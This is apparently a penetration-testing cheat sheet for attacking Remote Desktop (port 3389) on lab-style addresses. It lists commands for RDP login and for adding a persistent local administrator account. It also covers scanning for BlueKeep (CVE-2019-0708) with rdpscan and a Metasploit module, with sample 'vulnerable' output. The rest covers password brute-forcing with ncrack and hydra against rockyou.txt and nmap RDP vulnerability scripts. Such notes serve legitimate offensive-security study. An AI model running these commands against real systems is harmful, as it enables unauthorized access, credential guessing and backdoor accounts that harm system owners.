RDP 3389
#login
rdesktop -u DISCO 10.11.1.13
xfreerdp /u:admin /v:10.10.10.10 + clipboard
#Add a user
net user redcliff password123 /add
net localgroup Administrators redcliff /add
net localgroup "Remote Desktop Users" redcliff /ADD
#RDPscan
sudo git clone https://github.com/robertdavidgraham/rdpscan.git
./rdpscan 10.10.10.10
#msfconsole | bluekeep
nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst
msfconsole
> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
> set RHOSTS file:<path to rdp.lst>
> run
...
[+] 10.X.X.X:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
#Bruteforcing
ncrack -vv --user -P pwds.txt rdp://
hydra -V -f -L -P rdp://
ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1
sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13
#nmap script
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1
#ms-wbt-server Microsoft Terminal Services
nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11
Last updated